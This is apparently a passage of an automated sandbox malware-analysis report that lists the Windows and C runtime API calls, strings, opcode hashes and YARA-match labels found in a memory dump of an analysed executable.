                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 004224C6
                                                                • _free.LIBCMT ref: 004224D1
                                                                • _free.LIBCMT ref: 00422525
                                                                • _free.LIBCMT ref: 00422530
                                                                • _free.LIBCMT ref: 0042253B
                                                                • _free.LIBCMT ref: 00422546
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction ID: 58f4e587e69a32dac6c23b689706d054278821061d6879d412644195358b7cbe
                                                                • Opcode Fuzzy Hash: 2de8991c6391308a96b103f83ccd72a3c81e24415d01b5e1f5153397f2b628c1
                                                                • Instruction Fuzzy Hash: 7911B431A40B18FAD920BFB2DD47FCBB7DC5F08304FC0481EB699A6052D6ACB5514648
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetConsoleCP.KERNEL32(?,004058A0,00000000), ref: 00423B70
                                                                • __fassign.LIBCMT ref: 00423D4F
                                                                • __fassign.LIBCMT ref: 00423D6C
                                                                • WriteFile.KERNEL32(?,004058A0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423DB4
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00423DF4
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00423EA0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                • String ID:
                                                                • API String ID: 4031098158-0
                                                                • Opcode ID: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
                                                                • Instruction ID: a467c14f7ebf387d8f292150a90acf63a4f3dd59af87892f088fdbcdb0a48f83
                                                                • Opcode Fuzzy Hash: 398e7761831c6a10ae857aa9721353ed2b132615db7f716761bb2a6aa914b76f
                                                                • Instruction Fuzzy Hash: 72D19F71E002689FCF15CFA8D8809EDBBB5BF49314F64016AE855B7342D738AE46CB58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,004198C7,004194B7,00418CFC), ref: 004198DE
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 004198EC
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00419905
                                                                • SetLastError.KERNEL32(00000000,004198C7,004194B7,00418CFC), ref: 00419957
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction ID: dfdc178befc3424474c629a448357edf8bf4b92ab251d18c35ab581d65446efd
                                                                • Opcode Fuzzy Hash: 0f6e51aa0c255468b6a622d8c735b9b5b069fdda8c7ed9770d7dbe64c9198e0d
                                                                • Instruction Fuzzy Hash: 7101F5726193115EE6282676BD959E72774EB05778320023FF210852E0EB590C85D58D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                • C:\Users\user\Desktop\file.exe, xrefs: 00421063
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: C:\Users\user\Desktop\file.exe
                                                                • API String ID: 0-1957095476
                                                                • Opcode ID: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
                                                                • Instruction ID: d9f0d1edbe79c721972c5de009bde6595bd14974265b531d28add2f36aac6c1f
                                                                • Opcode Fuzzy Hash: 87dee6722e1b6ccd551237ea2535ba9f7b479b31bc556fd5bfd9a7fcbd75ff9b
                                                                • Instruction Fuzzy Hash: 1021F871700125AFDB20AF62ACC186B776CEF14368790452BF91593261DB38EC9187A8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcsrchr
                                                                • String ID: .bat$.cmd$.com$.exe
                                                                • API String ID: 1752292252-4019086052
                                                                • Opcode ID: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
                                                                • Instruction ID: 010fe26d956af5bd087513acdd8c981cfa3e4b5d319970c9fb4408be828d902b
                                                                • Opcode Fuzzy Hash: 570c69b01f606cfad589b38b12c5c8273c60fca63bd2e970eee5f9d36b6f2e4e
                                                                • Instruction Fuzzy Hash: 0D01E537684636352614211AAC427B717A99BDABB4B25012FFC44F72C1FE8CEC8251DC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-
                                                                • API String ID: 0-2084034818
                                                                • Opcode ID: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction ID: cadd73a2a830a1b03fc792233cfe60f62a5f785435c8c8d28cbd2197b084f308
                                                                • Opcode Fuzzy Hash: 320331af6566cb962ace0647e76be2ad38b69705adbc3407a77f9eddf13dbea2
                                                                • Instruction Fuzzy Hash: A311DA71B12221EBC7324B249D44AAB77649F017E4B510533EE05A7391D738DDE1C6DE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA38
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041BA4B
                                                                • FreeLibrary.KERNEL32(00000000,?,?,0041BA18,0041F030,?,0041B9E0,0041BF66,?,0041F030), ref: 0041BA6E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
                                                                • Instruction ID: ed62b177b772f88879a3613f9265b3cbba58386cad372b2ef282e3211ef706bb
                                                                • Opcode Fuzzy Hash: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
                                                                • Instruction Fuzzy Hash: A9F08C30601218FBDB259B50ED0ABEE7AB8EF04795F900171A900A11A0CB788E45DA98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetCPInfo.KERNEL32(00708240,00708240,?,7FFFFFFF,?,?,00427355,00708240,00708240,?,00708240,?,?,?,?,00708240), ref: 0042713C
                                                                • __alloca_probe_16.LIBCMT ref: 004271F2
                                                                • __alloca_probe_16.LIBCMT ref: 00427288
                                                                • __freea.LIBCMT ref: 004272F3
                                                                • __freea.LIBCMT ref: 004272FF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __alloca_probe_16__freea$Info
                                                                • String ID:
                                                                • API String ID: 2330168043-0
                                                                • Opcode ID: 91607b16f9be89b050216d0262b7a9086dcf85da4f2f58daa46203d23714b3eb
                                                                • Instruction ID: bfb7b1dd4e6a372b6cac35a08abb23c860549cbbf22db091a49783f100598494
                                                                • Opcode Fuzzy Hash: 91607b16f9be89b050216d0262b7a9086dcf85da4f2f58daa46203d23714b3eb
                                                                • Instruction Fuzzy Hash: FE81B371B082259BDF219FA5AC41AEF7BB5AF09354F98009BFC04A7341D629DC41CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __alloca_probe_16.LIBCMT ref: 00425A48
                                                                • __alloca_probe_16.LIBCMT ref: 00425B0E
                                                                • __freea.LIBCMT ref: 00425B7A
                                                                  • Part of subcall function 0041EB6A: HeapAlloc.KERNEL32(00000000,?,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041EB9C
                                                                • __freea.LIBCMT ref: 00425B83
                                                                • __freea.LIBCMT ref: 00425BA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                • String ID:
                                                                • API String ID: 1096550386-0
                                                                • Opcode ID: 0ed85803784aee2db6ff987fae84c9ab7c307a7471b8225ec02266551b54ed37
                                                                • Instruction ID: 47cc4f1c59843cf0fdcde6a6466f15fccfb65284f69525d754585251a764c7c9
                                                                • Opcode Fuzzy Hash: 0ed85803784aee2db6ff987fae84c9ab7c307a7471b8225ec02266551b54ed37
                                                                • Instruction Fuzzy Hash: F8510772700626AFEB205F55EC81EBF3BA9EF44764F95026BFC04A7250D738EC518698
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0041C120), ref: 0041C210
                                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041C26A
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0041C120,?,000000FF,00000000,00000000), ref: 0041C2F8
                                                                • __dosmaperr.LIBCMT ref: 0041C2FF
                                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0041C33C
                                                                  • Part of subcall function 0041C564: __dosmaperr.LIBCMT ref: 0041C599
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                • String ID:
                                                                • API String ID: 1206951868-0
                                                                • Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction ID: 4e69e7e4d88eedad6c45f19224540fe4c6ef1bb07ae0a9dc76835222067d53ae
                                                                • Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
                                                                • Instruction Fuzzy Hash: F1414F76940248ABCB24DFA5DC859EFBBF9EF89300704852EF856D3610D7389885CB69
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 004223E4
                                                                  • Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
                                                                  • Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9
                                                                • _free.LIBCMT ref: 004223F6
                                                                • _free.LIBCMT ref: 00422408
                                                                • _free.LIBCMT ref: 0042241A
                                                                • _free.LIBCMT ref: 0042242C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction ID: 06c163a86ce9bcf53bddb1e809bffc1f14a8d71068ad18bce2e552751ae1d238
                                                                • Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
                                                                • Instruction Fuzzy Hash: B5F04F32A41210BB8620EB66FAC2C4B73D9AA203117E5590AF804D7641CBBCFCC28A5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID: *?
                                                                • API String ID: 269201875-2564092906
                                                                • Opcode ID: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
                                                                • Instruction ID: a63c59b0d7da49b05f07040cb4a194fc74b471ca4969d8fc6594f89651597fee
                                                                • Opcode Fuzzy Hash: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
                                                                • Instruction Fuzzy Hash: 376160B5E002299FCB24CF99D8815EEFBF5EF48314B64416AE815F7301D739AE418B94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AdjustPointer
                                                                • String ID:
                                                                • API String ID: 1740715915-0
                                                                • Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction ID: d148374ac9c33eb5af7e197456be07967fb5ffa3c7fa52c118e22ba4f2cbab34
                                                                • Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
                                                                • Instruction Fuzzy Hash: C2510072A05286AFDB288F55D861BEB73A4FF00354F28402FE80647291E739EDC5C799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 004260CE
                                                                • _free.LIBCMT ref: 004260F7
                                                                • SetEndOfFile.KERNEL32(00000000,0042362D,00000000,0041E51E,?,?,?,?,?,?,?,0042362D,0041E51E,00000000), ref: 00426129
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,0042362D,0041E51E,00000000,?,?,?,?,00000000), ref: 00426145
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFileLast
                                                                • String ID:
                                                                • API String ID: 1547350101-0
                                                                • Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction ID: 1b0f2aef12d2ca725aa682019014df6231c69ba655f1b492b921229f4394e9e8
                                                                • Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
                                                                • Instruction Fuzzy Hash: 0B412C32B001209BDB11AFB5EC41B9E3765EF04364FA61117F814E7292D73CD851976C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0041BE4F: _free.LIBCMT ref: 0041BE5D
                                                                  • Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43
                                                                • GetLastError.KERNEL32 ref: 00420A32
                                                                • __dosmaperr.LIBCMT ref: 00420A39
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00420A78
                                                                • __dosmaperr.LIBCMT ref: 00420A7F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                • String ID:
                                                                • API String ID: 167067550-0
                                                                • Opcode ID: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
                                                                • Instruction ID: a194d0f24e8f29cf6dc2264e026a9bddb0740e8876572cad8ab677f0b0fd6e86
                                                                • Opcode Fuzzy Hash: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
                                                                • Instruction Fuzzy Hash: 4C21A771700329AF9B20AF66ACC186BB7ECEF103687D0452AF92997252D738DC418799
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,00000000,?,0041BDCD,00000000,?,?,?,0041BF66,?), ref: 0041EF79
                                                                • _free.LIBCMT ref: 0041EFD6
                                                                • _free.LIBCMT ref: 0041F00C
                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,0041BF66,?), ref: 0041F017
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction ID: 95c26f371b7850b2bddc85ae7a4fd83e17c88bc25bbbbd0a2489a901185ef23c
                                                                • Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
                                                                • Instruction Fuzzy Hash: 8B110A362042127A96102B7BACC1DEB19699BC1378775013BFD2A822D2EE6D8CDB511C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetLastError.KERNEL32(?,?,?,0041C835,0041EBAD,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F0D0
                                                                • _free.LIBCMT ref: 0041F12D
                                                                • _free.LIBCMT ref: 0041F163
                                                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F16E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_free
                                                                • String ID:
                                                                • API String ID: 2283115069-0
                                                                • Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction ID: 43f7999f07bdf9caa0489b11563b1ed73c9ba6fe2d35dc558eaeab45f7604291
                                                                • Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
                                                                • Instruction Fuzzy Hash: EC114C32200202BAC710267AECC5DEF266997C5778771023BF92A822D2EE6C8CDF411C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0041F8C3
                                                                • GetLastError.KERNEL32(?,0042473A,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104,?), ref: 0041F8CD
                                                                • __dosmaperr.LIBCMT ref: 0041F8D4
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction ID: 803fc007063167f67073d72d48b77dd8b306300581abe4bc3ca65f7a6a8e9d61
                                                                • Opcode Fuzzy Hash: a32e98b3cc518d6611017c09f407fb25a1ea39571fe78292492d3cfee0b11311
                                                                • Instruction Fuzzy Hash: 19F01232700115BB8B206BA6DD0499BBF69FF443A43504536F51DC6121DB35E8A7D7D4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,0041FA12,00000000,?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001), ref: 0041F92C
                                                                • GetLastError.KERNEL32(?,004246C5,00000000,00000000,0041FA12,?,?,00000000,00000000,00000001,00000000,00000000,?,0041FA12,00000000,00000104), ref: 0041F936
                                                                • __dosmaperr.LIBCMT ref: 0041F93D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorFullLastNamePath__dosmaperr
                                                                • String ID:
                                                                • API String ID: 2398240785-0
                                                                • Opcode ID: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction ID: 37d27302a1a2eca8b092f01353d8cc03fb9fecfc19a8c04071e9600c3881e131
                                                                • Opcode Fuzzy Hash: de22d5bbe60f73852fa7c7c3b833e9708c9e2b0bf73d21007ae8885001f27472
                                                                • Instruction Fuzzy Hash: 66F06271200515BB8B206BA2CD04E97BFA9FF443A03404536F51DC6120CB35E8A7CBD4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,004058A0,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0), ref: 004273D6
                                                                • GetLastError.KERNEL32(?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0,?,00424451,004058A0), ref: 004273E2
                                                                  • Part of subcall function 004273A8: CloseHandle.KERNEL32(FFFFFFFE,004273F2,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000,004058A0), ref: 004273B8
                                                                • ___initconout.LIBCMT ref: 004273F2
                                                                  • Part of subcall function 0042736A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00427399,00426AC4,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 0042737D
                                                                • WriteConsoleW.KERNEL32(004058A0,0000000F,00437A38,00000000,?,00426AD7,004058A0,00000001,004058A0,004058A0,?,00423EFD,00000000,?,004058A0,00000000), ref: 00427407
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                • String ID:
                                                                • API String ID: 2744216297-0
                                                                • Opcode ID: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction ID: f4aa61af986e557aabc683dea4287ad527f4dae7078adb09fe65b6480a605f88
                                                                • Opcode Fuzzy Hash: 654839e4b531a485c8561e35f9c6b1b80fe1c4fa203d6a6e5454fb2027dc39d5
                                                                • Instruction Fuzzy Hash: 0DF01236200128BBCF222F95EC0598A3F66FF09761B814035FE1885221D6328861DB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.314144198.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$Sleep
                                                                • String ID:
                                                                • API String ID: 422425972-0
                                                                • Opcode ID: 341ff27edc9d80adde49285ccd53ede86e99968b94c227c8f2cb1043e662c4d8
                                                                • Instruction ID: 510d45b7b4832c20ba14fd4772b7373e315d1c5f6d293ea37511ad809640c0fb
                                                                • Opcode Fuzzy Hash: 341ff27edc9d80adde49285ccd53ede86e99968b94c227c8f2cb1043e662c4d8
                                                                • Instruction Fuzzy Hash: 7EE06C31BE9324B2F07066A01C03F891A549B09FA1F720023B70C7E0D089D8748A8AAE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _free.LIBCMT ref: 0041D902
